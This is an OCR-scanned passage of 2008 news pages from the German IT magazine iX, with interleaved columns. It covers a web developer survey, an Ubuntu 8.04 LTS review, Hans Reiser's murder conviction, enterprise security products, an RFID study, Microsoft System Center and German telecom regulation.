up-Sprachen wie (X)HTML 
und XML. Fast ebenso viele 
nennen Styling. Es folgen 
Backend-Programmierung mit 
knapp 61 % sowie barriere- 
freies Webdesign mit knapp 
50 %. Flash-Entwickler haben 
an der Umfrage so gut wie 
nicht teilgenommen — viel- 


Wie viele Stunden arbeiten Sie für gewöhnlich pro Woche? 


Bis zu 20 I 1 10,41% 
21-25 a] 3,85% 
26 - 30 m] 3,49% 
31=35 1 3,35% 
36-40 I 18,18% 
41-45 29,01% 
46 - 50 ] 17,50% 
31-55 (| 5,70% 
56-60 m] 4,35% 
mehr als 60 EEE 4,17% 


Corinna wandelt Informationen in Wissen um 


Die Karlsruher Firma living-e 
bringt mit Corinna (Corporate 
Intelligence Application) eine 
Plattform für die unternehmens- 
weite Bereitstellung von Wis- 
sen, Suche und Analyse auf den 
Markt. Dem Anbieter zufolge 
soll sie die Vorteile eines 
Enterprise-Content Manage- 
mentsystems mit semantischer 
Intelligenz vereinen. Die Wis- 
sensvermittlung findet in beste- 
hende Portallösungen und An- 
wendungen, integriert in der 
Arbeitsumgebung des Nutzers, 
statt. Die Interessenschwerpunk- 
te kann der Anwender selbst de- 


PHP-Entwicklung: Code- 
gear hat die Version 2.0 von 
Delphi für PHP fertiggestellt. 
Die IDE enthält eine Visual 
Component Library, die be- 
kannte PHP-Pakete wie das 
Zend Framework unterstützt. 
Außerdem können Entwickler 
per Drag & Drop mit einer 
Reihe von DBMS arbeiten: 
von MySQL bis zum SQL 
Server, von PostgreSQL bis 
zu Oracle und DB2. Bis Juni 
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finieren. Das System analysiert 
aber auch das Verhalten anhand 
der durchgeführten Suchanfra- 
gen sowie der vom Nutzer ver- 
wendeten Dokumente. 

Corinna soll alle für einen 
Anwendungsfall entscheidungs- 
relevanten Informationen aus 
den Unternehmenssystemen 
möglichst effizient zur Verfü- 
gung stellen. Die Software be- 
steht aus einem Kern und 
mehreren als Services konzi- 
pierten Modulen, die verschie- 
dene Funktionen und Work- 
flows umfassen. Xtraclass etwa 
ordnet Dokumente verschiede- 


dieses Jahres soll der Preis 
178 € betragen, für ein Up- 
grade 130 € (www.codegear. 
com). 


Content Management: Core- 
media, Hamburger CMS-An- 
bieter, hat in seiner 2008er- 
Release Erweiterungen für 
„social Software‘, ein Starter- 
kit sowie ein Analysewerk- 
zeug integriert. Bei Ersterer 
handelt es sich um eine Um- 
gebung für Web-2.0-Anwen- 
dungen, das Starterkit bietet 
fertige Templates sowie 
Stylesheets und Letzteres er- 


leicht gibt es in Deutschland 
keine. 

Circa 76 % der Teilnehmer 
arbeiten seit drei bis zehn Jah- 
ren in ihrem Beruf, gut ein 
Viertel selbstständig. Über 80% 
der Webschaffenden ist mit ih- 
rer Tätigkeit mindestens zu- 
frieden. Ein Fünftel verdient 
im Jahr weniger als 10 000 €, 
was daran liegen kann, dass 
nicht alle Teilnehmer vollzeit- 
beschäftigt sind. Der Durch- 
schnitt liegt nach den Antwor- 
ten zwischen 30 000 und 
35 000 € — wobei gilt, dass mit 
höherem Studienabschluss das 
Gehalt höher ausfällt. Frauen 
stellen lediglich ein Zehntel der 
Webworker; anders als im Vor- 
bild der Befragung: Das On- 
line-Magazin A List Apart hatte 
2007 eine Befragung durchge- 
führt, die über 16 % weibliche 
Teilnehmer hatte. Die gesamte 
Auswertung steht auf der Er- 
gebnisseite zum Download zur 
Verfügung (jendryschik.de/ws 
dev/umfrage/ergebnisse/). 


nen Strukturen zu und lernt an- 
hand vorgegebener Beispiele. 
Semantics dient der Abbildung 
von Wissensbeziehungen über 
Ontologien, Searchminder hilft 
bei der Suche auch mit Fuzzy 
Logic, während Duplicate Re- 
cognition Dubletten erkennt. 
Für Dokumente, für die es noch 
keine Struktur gibt, soll Cluste- 
ring künftige Zuordnungen vor- 
schlagen. In einem zentralen 
Wissensspeicher legt die Soft- 
ware mit NLP-Methoden (Na- 
tural Language Processing) ex- 
trahierte Informationsteile als 
Ontologien ab. Susanne Franke 


laubt mit Standardreports, die 
Nutzung der eigenen Web- 
sites zu analysieren (www.core 
media.com). 


Kartenformat KML: Google 
hat im April die XML-An- 
wendung KML an das Open 
Geospatioal Consortium 
(OGC) übergeben, wo die 
Geodatensprache jetzt als of- 
fener Standard betrieben wird 
(www .opengeospatial.org/ 
standards/kml). Vom OGC 
stammt außerdem die Geogra- 
phy Markup Language 
(GML). 


31 


MARKT + TRENDS 


Linux 


Ubuntu 8.04 LTS 


Vogelkunde 


Markus Franz 


Fast zwei Jahre sind seit der Veröffentlichung der 
letzten Ubuntu-Version (6.06, Codename: Dapper 
Drake) mit Long Term Support vergangen. Zwar bietet 
die neue Release viele Neuerungen, nur fallen die im 
Vergleich zum Vorgänger mäßiger aus. 


ark Shuttleworth, Gründer 

der Firma Canonical, hat 
das neue Ubuntu 8.04 als die 
wichtigste Release der letzten 
Jahre bezeichnet, da der Debi- 
an-Abkömmling inzwischen auf 
Millionen Computern zum Ein- 
satz kommt. Beim neuen Ubun- 
tu handelt es sich nach fast zwei 
Jahren wieder um eine LTS- 
Version (Long Term Support). 
Das bedeutet, dass Canonical 
für den Desktop drei und für 
den Server fünf Jahre lang Up- 
dates bereitstellt. Gleichzeitig 
bietet die Firma in diesem Zeit- 
raum kommerzielle Unterstüt- 
zung an. Kunden mit Support- 
Vertrag kommen mit Landscape 
in den Genuss einer kommer- 
ziellen, per Weboberfläche be- 
dienbaren Systemverwaltung. 
Von der gemeinsamen Admi- 
nistration, über die Softwarever- 
teilung bis zur automatischen 
Inventarliste kann Landscape 
den Administrationsaufwand 
erheblich verringern. Das alles 
macht die Version 8.04 auch für 
den Unternehmenseinsatz at- 
traktiv. Sie trägt den Codena- 
men Hardy Heron und steht als 
Desktop- und Server-Variante 
seit dem 24. April zum Down- 
load bereit. 


Live-CD als 
Installationsmedium 


Wie immer besteht Ubuntu aus 
einer x86- oder x86_64-Live- 
CD oder -DVD, die sich auf die 
Festplatte installieren lässt. Die 
Varianten für PowerPC und 
SPARC gehören nicht mehr 
zum Hauptprojekt, und wurden 
ausgelagert (ports.ubuntu.com): 
Ein Update erfordert auf diesen 
Plattformen das Anpassen der 
Paketquellen. Darüber hinaus 
gibt es eine spezielle Server- 
Installations-CD ohne GUI. 
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Weiter existieren die ebenfalls 
aktualisierten Variationen wie 
Kubuntu, Xubuntu oder Edu- 
buntu. Von diesen schmückt 
nur Edubuntu das Prädikat 
LTS - bei Kubuntu stand dem 
wohl die anstehende Migration 
von KDE 3.5.x auf KDE 4 ent- 
gegen. 

Für Umsteiger ist das Instal- 
lations-Tool namens Wubi ge- 
dacht. Es läuft unter Windows 
und installiert Ubuntu ins Win- 
dows-Dateisystem — man kann 
aber trotzdem wie gewohnt 
beim Hochfahren Ubuntu als 
Betriebssystem auswählen. Be- 
nutzern erspart Wubi so nicht 
nur das gefährliche Partitionie- 
ren, sondern Ubuntu lässt sich 
bei Nichtgefallen auch schnell 
und restlos wieder entfernen. 
Hierbei hilft ein neuer Assistent. 

Als Standard-Desktop setzt 
Ubuntu auch in der neuen Ver- 
sion auf Gnome 2.22. Die aktu- 
alisierte Auflage verwendet statt 
GnomeVFS nun das virtuelle 
Dateisystem GVFS, das den 
Dateimanager Nautilus spürbar 
beschleunigt. Außerdem lassen 
sich damit Partitionen über 
FUSE (File System in User 
Space) einbinden und der direk- 
te Zugriff auf FTP, SMB, DAV 
und andere realisieren. Das neue 
Gnome bringt den verbesserten 
Videoplayer Totem mit, der nun 
deutlich mehr Formate abspielt. 
Weiter fällt auf, dass die Ent- 
wickler den alten VNC-Client 
durch das komfortable Pendant 
Vinagre ersetzten: Damit lassen 
sich automatisch zur Fernsteue- 
rung freigegebene Rechner im 
Netz finden. 

Ebenfalls neu ist Firefox 3 — 
obwohl erst als Beta vorliegend, 
hat der Browser es in die LTS- 
Release geschafft. Canonical 
begründet dies mit der langen 
Laufzeit von Hardy Heron, zu 
der die Vorversion von Firefox 


am besten passt. Ob die Stabi- 
lität Firmenansprüchen genügt, 
muss sich erst zeigen. Der neue 
Firefox fällt beim Aufbau kom- 
plexer Webseiten angenehm auf 
— hier sind die neue Rendering- 
Engine und die Javascript-Im- 
plementierung deutlich schnel- 
ler als in den Vorversionen. Der 
Lesezeichen-Manager präsen- 
tiert sich komfortabler und 
macht Spaß: Er bietet nicht nur 
die Standard-Lesezeichen, son- 
dern auch dynamisch generier- 
te wie die zuletzt besuchten 
oder am häufigsten verwende- 
ten Seiten. Umständlicher ist 
aber die Warnung bei ver- 
schlüsselten Seiten mit nicht 
absolut sicherem Zertifikat: 
Dann muss man sich durch drei 
Menüs klicken, um den Zugang 
manuell zu genehmigen - bis- 
her ging das schneller. 

Audio-CDs und andere Me- 
dien lassen sich mit Ubuntu 
8.04 sowohl direkt in Nautilus 
als auch im neuen Brasero Disc 
Burning erstellen. Erfreulich ist 
dabei die einfache Möglichkeit, 
schnell ein Medium von einer 
Image-Datei zu brennen. Klei- 
nere Änderungen am Desktop 
runden das Bild positiv ab: Ne- 
ben einem Bittorrent-Client 
bietet Ubuntu nun in der Stan- 
dardkonfiguration auch einen 
ausgewachsenen Download- 
Manager. Openoffice hat in 
Version 2.4 Einzug in Ubuntu 
gehalten. 


Ein Blick 
unter die Haube 


Im Hintergrund von Ubuntu 
werkelt der Kernel 2.6.24-3. 
Ebenso wie der Vorgänger 
bringt dieser den Fair-Schedu- 
ler mit, der die Rechenzeit ge- 
rechter auf die Anwendungen 
verteilt. Er soll in der aktuellen 
Release ein angenehmes Arbei- 
ten mit Multimedia und der 
Textverarbeitung gewährleis- 
ten. Als Sound-Server setzt 
Ubuntu nun Pulse Audio ein: 
Damit lassen sich mehrere 
Ausgabequellen besser mixen 
sowie der Sound auf einer an- 
deren Maschine im Netz ausge- 
ben. Um die Darstellung des 
GUI kümmert sich Xorg 7.3, 
das die automatische Konfigu- 
ration vereinfacht: Im laufen- 
den Betrieb lässt sich nun die 
Größe des Bildschirm ebenso 
ändern wie seine Drehung. 
Notebook-Nutzern dürfte gefal- 
len, dass sich damit auch exter- 


Produktname: Ubuntu 8.04 LTS 
Anbieter: Canonical Lid. 


Download: 
www.ubuntu.com/download 


Support: ab 170 €/600 € 
pro Jahr (Desktop Server) 


Details: 
www.canonical.com/services/ 
support 


ne Monitore oder Beamer dy- 
namisch ins System einbinden 
lassen. Für 3D-Effekte aktuali- 
sierten die Entwickler Compiz 
nebst zugehöriger Plug-ins. 

In der Server-Ausgabe ver- 
zichtet Hardy Heron restlos auf 
X, was der Systemsicherheit 
zugutekommt. Apropos Si- 
cherheit: Wie bisher integriert 
Ubuntu AppArmor. Es existie- 
ren nun aber für mehr Anwen- 
dungen vordefinierte Richtli- 
nien, sodass man diese schnell 
einsetzen kann. SELinux steht 
im Universe-Repository zur 
Verfügung, Canonical bietet 
allerdings im Rahmen des Long 
Term Support keine Unterstüt- 
zung dafür. Das von Fedora 
bekannte Policy-Kit schafft Si- 
cherheit, indem man Benutzern 
gezielt Rechte für Verwaltungs- 
aufgaben zuweisen kann. Die 
UFW (Uncomplicated Firewall) 
komplettiert das Sicherheits- 
konzept: Das Kommandozei- 
lenprogramm für Iptables rich- 
tet eine auf Netfilter basierende 
Firewall schnell ein — eine gra- 
fische Oberfläche wäre jedoch 
wünschenswert gewesen. 

Als Virtualisierungslösung 
dient im neuen Ubuntu nun 
KVM. Mit Red Hats Virt Ma- 
nager gestaltet sich die Kontrol- 
le über virtuelle Maschinen ein- 
facher als bisher. Im Netzwerk 
gefällt die Software Likewise 
Open, die für Authentifizierung 
im Active Directory zuständig 
ist. Mit OpenJDK 6 enthält 
Ubuntu nun auch ein komplett 
freies Java, mit dem sich Eclipse 
problemlos ausführen lässt. 

Mit Ubuntu 8.04 (Hardy 
Heron) hat Canonical wirklich 
eine leistungsfähige Linux- 
Distribution vorgestellt. Bis auf 
Firefox, dessen Beta-Status ein- 
fach nicht zu einer LTS-Release 
passen mag, gibt die neue Ver- 
sion in den Punkten Sicherheit, 
Programme und Stabilität ein 


gewohnt gutes Bild ab. (avr) 
Eixtink ix0806032 
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Hans Reiser des Mordes an seiner Frau schuldig gesprochen 


Seit November 2007 muss sich 
der bekannte Entwickler Hans 
Reiser für das Verschwinden 
seiner Frau verantworten. Der 
Initiator der Journaling-Datei- 
systeme ReiserFS und Reiser4 
soll seine Frau getötet haben. 
Am 28. April haben ihn die 
Geschworenen eines Bezirks- 
gerichts nach nur drei Tagen 
Beratung schuldig gesprochen. 

Der Fall erregte gerade in der 
Community große Aufmerk- 
samkeit. Während des fünfmo- 
natigen Verfahrens konnte sich 
die Anklage nur auf Indizien 
stützen. Weder wurde die Lei- 
che von Reisers Frau gefun- 
den noch gibt es Zeugen der 
Tat. Nina und Hans Reiser 
lernten einander 1998 in Russ- 
land kennen, heirateten kurz 
danach und zogen an die US- 
Westküste. Das Ehepaar hat 
zwei Kinder, jedoch reichte 
Nina Reiser 2004 die Schei- 
dung ein. Ein erbitterter Schei- 
dungskrieg begann. 

Im September 2006 ver- 
schwand Nina Reiser spurlos, 
nachdem sie ihre Kinder bei 
Hans Reiser abgegeben hatte. 
Einige Tage später wurde ihr 
Auto unweit ihrer Wohnung 
mit verdorbenen Lebensmitteln 
darin gefunden. Im Laufe des 
Verfahrens kamen über 60 
Zeugen zu Wort. Es nahm je- 
doch eine dramatische Wen- 
dung, als Hans Reiser in den 
Zeugenstand trat, um sein auf- 
fälliges Verhalten nach dem 
Verschwinden seiner Frau zu 
erklären. Als er gefragt wurde, 
warum der Beifahrersitz seines 
Zweisitzers fehlt, gab er zur 
Antwort, dass er in dem Auto 
schlafe und mehr Platz brau- 
che. Als die Polizei jedoch den 
Wagen beschlagnahmte, stand 
im Inneren mehrere Zentimeter 
hoch das Wasser. Reiser hatte 
offensichtlich versucht, den 
Wagen gründlich zu reinigen. 
Dass in seinem Besitz ein 
Buch mit dem Titel „Der per- 
fekte Mord“ gefunden wurde, 
kommentierte er mit der Er- 
klärung, er habe die Vorge- 
hensweise der Polizei besser 
verstehen wollen, nachdem er 
im Fadenkreuz der Ermittler 
stand. 

Hans Reiser verstärkte durch 
seine Aussage nur die Anschul- 
digungen gegen ihn. Er behaup- 
tete im Verfahren immer wie- 
der, Nina sei heimlich in ihre 
Heimat zurückgekehrt. Andere 
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Zeugen präsentierten jedoch ein 
anderes Bild von der Vermiss- 
ten. Nina Reiser würde nie ihre 
Kinder im Stich lassen und oh- 
ne sie das Land verlassen. 

Die Geschworenen gaben 
nun dem Staatsanwalt recht. 
Die Verkündung des Strafma- 
Bes ist für den 9. Juli angesetzt. 
Reiser muss mit 25 Jahren Ge- 
fängnis rechnen. Reisers Ver- 


teidiger hatte auf Freispruch 
plädiert. Er gab zwar zu, sein 
Mandant sei ein äußerst schwie- 
riger und oft despotischer 
Mensch, aber das mache ihn 
nicht zum Mörder. 

Auf die Zukunft von Linux 
und Reiser4 dürfte die Verur- 
teilung keinen Einfluss mehr 
haben. Zwar ist die bislang hin- 
ter der ReiserFS- und Reiser4- 


Entwicklung stehende Firma 
Namesys seit einigen Monaten 
nicht mehr operativ tätig, je- 
doch entwickeln einige vorma- 
lige Namesys-Mitarbeiter Rei- 
ser4 in Eigeninitiative weiter. 
Suse und Debian setzten bisher 
beide Reiser3 ein — beide wol- 
len zukünftig auf Ext3 sowie 
dessen Nachfolger Ext4 setzen. 

Arno Puder 


33 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


MARKT + TRENDS 


Sicherheit/RFID 


Bitkom-Leitfaden zur Patentanmeldung 


Im „Leitfaden zur Patentierung 
computerimplementierter Erfin- 
dungen“ beschreibt der Bran- 
chenverband Bitkom, welche 
Kriterien Unternehmen bei Pa- 
tentanträgen von IT-Systemen 
und technisch einsetzbaren 
Computerprogrammen berück- 
sichtigen sollten. Der Leitfaden 
soll vor allem kleine und mitt- 
lere Unternehmen unterstützen. 
Nach Auffassung des Bran- 
chenverbands können sie ihre 
Erfindungen nur mithilfe von 
Patenten vor Imitationen schüt- 
zen. Darüber hinaus seien Pa- 
tente der einzig wirksame 
Schutz vor dem Verlust des 
geistigen Eigentums an die 
Konkurrenz. Außerdem stärken 
Patente die Position der KMU 
gegenüber Großunternehmen 
und erhöhen den Wert eines 
Unternehmens. So können sie 
zum Beispiel als Tauschwäh- 
rung bei Geschäftsverhand- 
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lungen eingesetzt werden. 
Nach Angaben von Bitkom 
erfüllen viele Patentanmel- 
dungen die Kriterien der Pa- 
tentämter nicht. Das führt da- 
zu, dass die Ämter im Jahr 
2007 weniger Patente zugelas- 
sen haben als im Vorjahr: In 
Europa sank die Zahl der Zu- 
lassungen um 13 Prozent, in 
Deutschland um 16 Prozent. 
Der Leitfaden informiert über 
den aktuellen rechtlichen Stand 
von Softwarepatenten, über die 
Anmeldeprozedur im nationa- 
len und internationalen Umfeld 
sowie über Kosten und Zeitauf- 
wand und demonstriert anhand 
eines Beispiels, in welcher 
Form der Antragsteller seine 
Erfindung beschreiben sollte. 
Der kostenlose Leitfaden ist im 
Internet als PDF verfügbar, sie- 
he iX-Link. Barbara Lange 
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Vor allem kleine 
und mittlere Unter- 
nehmen will der 
Branchenverband 
Bitkom mit seiner 
kostenlosen 
Patentbroschüre 
unterstützen. 


Vollständige Datenverschlüsselung 


Der Mobile Guardian Enter- 
prise Edition 6.0 von Credant 
lässt sich in Symantecs Ma- 
nagementplattform Altiris für 
Endgeräte integrieren. Damit 
sollen IT-Administratoren die 
Möglichkeit erhalten, über die 
Verwaltungskonsole Daten 
auf mobilen Endgeräten eines 
Unternehmens zu verschlüsseln 
und zu auditieren. Das Produkt 
soll alle Daten unabhängig von 
ihrem Speicherort und für den 
Endbenutzer transparent ver- 
schlüsseln — ob auf dem Desk- 
top, einem mobilen Endgerät 
oder auf externen Speicherme- 
dien wie USB-Sticks. Adminis- 
tratoren können die Software 
zentral verwalten und Policies 
aufsetzen, die der Guardian an 
Shield-Agenten auf den Desk- 
tops beziehungsweise Laptops 
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oder PDAs schickt, und die 
festlegen, was und wie ver- 
schlüsselt wird. 

Dateien und Ordner lassen 
sich entweder so verschlüsseln, 
dass jeder in der Organisation 
sie öffnen kann, oder so, dass 
nur der jeweilige Nutzer sie 
verwenden kann. Mobile Spei- 
chermedien, die zum ersten 
Mal versuchen, sich mit dem 
Unternehmensnetzwerk zu ver- 
binden, werden automatisch 
erkannt und in die Sicherheits- 
vorkehrungen eingebunden. 
Hinzugekommen ist in der 
neuen Version ein Stand-alone 
Windows Shield für Daten auf 
Maschinen, die nicht zentral 
verwaltet werden, etwa die ei- 
nes Subunternehmers oder 
Geschäftspartners. 

Susanne Franke 


Studie warnt vor Schlamperei bei IAM 


Kuppinger, Cole + Partner ha- 
ben zwei neue Studien durch- 
geführt. Die eine untersucht 
Single-Sign-On (SSO) als ei- 
nes der wichtigsten Felder im 
Identity- und Access-Manage- 
ment (IAM). Durch eine ver- 
einheitlichte Authentifizierung 
können unter anderem die Ri- 
siken für Sicherheit und Com- 
pliance sowie Help-Desk-Kos- 
ten reduziert werden. Innerhalb 
der Vielzahl der technischen 
Ansätze für das SSO erachten 
die Experten Identity Federa- 
tion (unternehmensübergreifen- 
des ID-Management) und er- 
gänzend das benutzerzentrierte 
Identity-Management (Kontrol- 
le des Nutzers über seine Da- 
ten) als günstigste Ansätze, 
weil sie sich auf alle Anwen- 
dungsfelder sowohl mit inter- 
nen als auch externen Benut- 
zerın und im heterogenen 
Umfeld flexibel einsetzen las- 
sen. Da Federation aber erst 
langsam kommt, werden auch 


auf lange Sicht ergänzende Ver- 
fahren benötigt. Die größte Be- 
deutung haben dabei Enter- 
prise-Single-Sign-On-Lösungen 
sowie verwaltete Verfahren für 
lokales SSO in Verbindung mit 
Token für die internen Benutzer 
und das Web-SSO für externe 
Benutzergruppen, aber auch 
interne Webportale. Ein wei- 
terer Report des Hauses unter- 
sucht das Verhältnis von JAM 
und serviceorientierte Architek- 
turen. Die Studie macht deut- 
lich, dass nur die wenigsten 
Unternehmen ein „definiertes 
Zusammenspiel“ zwischen den 
beiden Bereichen haben. Kup- 
pinger warnt vor den Konse- 
quenzen der fehlenden Gover- 
nance für die Compliance 
und das Risikomanagement. 
Die Studien (195 € bzw. 295 €) 
sind über die Website www. 
kuppingercole.com zu bestellen. 

Susanne Franke 
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RFID-Enttäuschung bei Handel und Industrie 


Für die Studie „RFID - Spiel- 
wiese für Technologiebegeis- 
terte oder Schlüsseltechnologie 
zur Effizienzsteigerung von 
Geschäftsprozessen?“ inter- 
viewte das Fraunhofer-Institut 
für Produktionstechnologie IPT 
und die P3 Ingenieurgesell- 
schaft mbH Vertreter von 1000 
Unternehmen aus den Berei- 
chen Logistik, Maschinenbau, 
Automobilbau, Elektrotechnik 
sowie Luft- und Raumfahrt. 
Gleichzeitig testeten die betei- 
ligten Autoren die Leistungs- 
fähigkeit der verschiedensten 
RFID-Systeme unter Laborbe- 
dingungen. 

Die Ergebnisse: 80 Prozent 
der Befragten bezeichneten ih- 
re Erwartungen und Erfahrun- 
gen mit RFID als negativ. Pi- 
lotprojekte sind teuer, führen 
aber vielfach nicht zu den er- 
hofften Ergebnissen. Zwar 
nannten 72 Prozent der Unter- 
nehmen die Automatisierung 
gesamter Prozessketten als 
Ziel ihrer RFID-Einführung, 
kamen jedoch über einfache 
logistische Anwendungen nicht 
hinaus, da sie wertschöpfende 
Unternehmen gar nicht einbe- 
zogen hatten. RFID ermöglicht 
zwar eine Integration unterneh- 
mensübergreifender Prozesse, 
aber nur 66 Prozent der be- 


fragten Unternehmen haben 
dieses in ihren RFID-Projek- 
ten auch realisiert. 

Darüber hinaus fehlte es an 
Wirtschaftlichkeitsbetrachtun- 
gen. Fast 25 Prozent der Be- 
fragten hatten diesen Schritt 
im Vorfeld eines Projektes 
übersprungen. Damit konnten 
sie ein wichtiges Ziel, Kosten- 
senkung durch RFID, häufig 
nicht erreichen. 30 Prozent 
hatten auch keine technischen 
Machbarkeitsstudien durchge- 
führt — ein weiterer Mangel, 
da RFID-Systeme in jedem 
Unternehmensumfeld auf ei- 
gene Bedingungen treffen. 
Die Studie bemängelt die In- 
kompatibilität existierender 
Standards und technische 
Schwierigkeiten beim Aus- 
lesen von Daten bei Ultra- 
Hochfrequenz-Systemen. 

Fazit: Immer noch sind es 
die Technologiebegeisterten, 
die RFID einsetzen. Damit 
Unternehmen die Mängel in 
den Griff bekommen, werden 
sie immer häufiger Dienstleister 
beauftragen müssen. Die Studie 
kostet 199 Euro und kann über 
Mario Isermann (Fraunhofer 
IPT, siehe iX-Link) bezogen 


werden. Barbara Lange 
Eix-ink ix0806034 
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Administration 


Microsoft verwaltet jetzt auch Linux 


Auf dem „Management Sum- 
mit 2008“ in Las Vegas hat Mi- 
crosoft neue Funktionen rund 
um die System-Center-Familie 
vorgestellt. Besondere Auf- 
merksamkeit genoss die Beta- 
Version der Cross Platform Ex- 
tensions für den System Center 
Operations Manager 2007. 

Sie erlauben der Manage- 
mentumgebung, neben den ei- 
genen Windows-Servern auch 
Fremdplattformen in die Ver- 
waltung einzubinden. „Out of 
the box“ gilt das für Server un- 
ter HP-UX, Red Hat Enterprise 
Linux, Sun Solaris und Suse 
Linux. Weitere System- und 
Anwendungsunterstützung sol- 
len Partnerfirmen beisteuern. 
So haben bereits Novell, Quest 
und Xandros eigene Add-ons 
zu den Cross Platform Exten- 
sions angekündigt. 

Basis der Cross Platform 
Extensions sind unter anderem 
WS-Management und Open Pe- 
gasus. Letzteres ist eine Open- 
Source-Variante der DMTF- 
Spezifikationen CIM (Common 
Information Model) und WBEM 
(Web Based Enterprise Ma- 
nagement). Nach einem Objekt- 
Provider-Modell werden dabei 
die Informationen der zu ver- 
waltenden Objekte über den CI- 


Geschluckt: Nimsoft hat In- 
dicative Software gekauft 
und erweitert damit sein 
Portfolio um Komponenten 
für Business Service Ma- 
nagement (BSM) und um 
Funktionen für die Überwa- 
chung von Antwortzeiten. 
Die Indicative-Tools bieten 
unter anderem Funktionen 
zur Service-Modellierung, 
zum Echtzeit-Monitoring be- 
nutzerseitiger Antwortzeiten 
sowie zur Analyse von J2EE- 
und .NET-Anwendungen. 


Eingebaut: BMC integriert 
Tibcos SOA-Plattform Ac- 
tivematrix in das eigene 
Business Service Manage- 
ment (BSM) mit dem Ziel, 
heterogene serviceorientierte 
Architekturen besser zu ver- 
walten. Das Ergebnis ist die 
Kombination der Manage- 
mentangebote von BMC mit 
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MOM (Model Object Model- 
ler) für die eigentlichen Ma- 
nagementanwendungen „über- 
setzt“. Microsoft kündigte an, 
dem Open Pegasus Steering 
Committee beizutreten und dort 
eigene Programmquellen einzu- 
bringen. Dies soll unter dem 
Dach der Microsoft Public Li- 
cense geschehen, die von der 
Open Source Initiative (OSD) 
anerkannt ist. 

Neben der breiteren Platt- 
formunterstützung hat Micro- 
soft sein System Center auch 
mit Blick auf die Verwaltung 
virtualisierter Umgebungen 
ausgebaut. Vorgestellt wurde 
unter anderem der neue Vir- 
tual Machine Manager, mit 
dem sich virtuelle Maschinen 
konfigurieren und verteilen 
lassen. Dabei findet neben den 
eigenen Produkten Windows 
Server 2008 Hyper-V und 
Virtual Server 2005 R2 auch 
VMwares ESX Server Unter- 
stützung. Zu guter Letzt wa- 
ren in Las Vegas Beta-Versio- 
nen neuer Konnektoren zu 
sehen, mit denen sich der Sys- 
tem Center Operations Mana- 
ger mit anderen Management- 
umgebungen „versteht“, etwa 
IBM Tivoli oder HPs Open- 
view. Achim Born 


den Tibco-Funktionen für 

Service-Integration, Entwick- 
lung zusammengesetzter An- 
wendungen und Governance. 


Alles im Blick: Numara Soft- 
ware hat im Rahmen der dies- 
jährigen Komcom Süd in 
Karlsruhe eine neue Ausgabe 
von Numara Track-It vorge- 
stellt. Die Version 8.1 der In- 
ventar- und Lizenzmanage- 
mentsoftware hat eine neu 
gestaltete Benutzeroberfläche, 
soll sich flexibel an die spezi- 
fischen IT-Anforderungen im 
öffentlichen Dienst anpassen 
lassen und kann nun Strich- 
codes verarbeiten. 


XML-Software: Mit ihrer 
zweiten Version der 2008er- 
XML-Suite bewältigt der Edi- 
tor XMLSpy von Altova 
deutlich umfangreichere 
XML-Dokumente. Außerdem 
unterstützt er Visual Studio 
2008 und verfügt über er- 
weiterte XSLT- und XQuery- 
Eigenschaften. 
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Kommunikation 


Breko-Verband kritisiert Bundesnetzagentur wegen zu hoher Leistungsmiete 


Die Geschäfte laufen im Grun- 
de nicht schlecht für die im 
Bundesverband Breitbandkom- 
munikation Breko zusammen- 
geschlossenen Netzbetreiber. 
Im vergangenen Geschäftsjahr 
erzielten sie einen Umsatz von 
5,6 Mrd. Euro und damit berei- 
nigt um Firmenzugänge ein 
Plus gegenüber dem Vorjahr 
um 20 %. Im laufenden Jahr 
wollen die Breko-Mitglieder, 
die 99 % des Festnetzwettbe- 
werbs der Telekom repräsen- 
tieren, die 6-Milliarden-Grenze 
packen. 

Bei der Vorstellung der Jah- 
resbilanz gab Breko-Präsident 
Peer Knauer, im Hauptberuf 
Versatel-Chef, jedoch zu be- 
denken: „Diesen Erfolg haben 
wir eher trotz als wegen der Re- 
gulierungsvorgaben erreicht. 
Die Miete der Teilnehmeran- 
schlussleitung ist mit 10,50 Eu- 
ro im europäischen Vergleich 
immer noch zu hoch und wir 
subventionieren immer noch 


Aufkauf: Cisco beabsich- 
tigt alle Anteile an Nuova 
Systems zu erwerben. Das 
in San Jose ansässige und 
auf Rechenzentren spezia- 
lisierte Startup-Unterneh- 
men agiert bereits seit Mit- 
te 2006 als 80-prozentige 
Tochter der Netzequip- 
ment-Firma mit dem Er- 
gebnis der Switching-Platt- 
form Nexus 5000. 


Eingekauft: Keynote Sys- 
tems plant, die kleine fran- 
zösische Softwareschmiede 
Zandan zu übernehmen, 
um sich die exklusiven 
Rechte an der für die Mo- 
bile Application Perspec- 
tive (MAP) genutzten 
Technik zu sichern. Bis- 
lang bestand nur ein nicht 
exklusiver OEM-Vertrag. 


Vermessen: Der eco-Ver- 
band, mit eigenen Zertifi- 
zierungen für Rechenzen- 
tren bereits am Markt aktiv, 
plant die Entwicklung eines 
Effizienz-Benchmark für 
hiesige RZ. Hierzu initiier- 
te eco nun im Vorfeld eine 
bis Ende Mai laufende Da- 
tenerhebungsphase. 
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mit rund 2 Milliarden Euro 
Terminierungsentgelten pro 
Jahr die Preisgestaltung der 
Mobilfunker.“ 

Unzufrieden zeigte sich der 
Verbandspräsident insbesonde- 
re mit der Länge der Verfahren 
bei der Bundesnetzagentur. Es 
gehe nicht an, so Knauer, dass 
sich beispielsweise die Be- 
ratungen über den Standard- 
vertrag zur Teilnehmeran- 
schlussleitung über zwei Jahre 
hingezogen hätten und ent- 
scheidende Missbrauchsver- 
fahren nicht stringent genug 
angegangen würden. Nicht 
hinnehmbar seien auch Ent- 
scheidungen, die eine weitere 
Entwertung der vorhandenen 
und zu schaffenden TK-Infra- 
struktur herbeiführen und das 
Konsistenzgebot unterlaufen 
würden. Insbesondere bei der 
Festlegung des Entgeltes für 
den IP-Bitstrom-Zugang am 
13. Mai fordert der Verband- 
schef ein klares Signal für den 


Datenschutz-Hausaufgaben für StudiVZ & Co. 


Die obersten Aufsichtsbehör- 
den für den Datenschutz in der 
Wirtschaft haben erstmals 
Leitlinien für Betreiber von so- 
zialen Netzwerken sowie von 
Bewertungsportalen veröffent- 
licht (siehe iX-Link). Portale 
wie SchuelerVZ oder StudiVZ 
müssen laut dem Ende April 
veröffentlichten Beschluss ihre 
Nutzer umfassend über die 
Verarbeitung ihrer Daten infor- 
mieren. Auch die Entschei- 
dung, wer welche Daten sehen 
darf, liegt beim Nutzer. Die 
Speicherung seiner Daten auf 
Vorrat hingegen oder persona- 
lisierte Werbung muss er nicht 
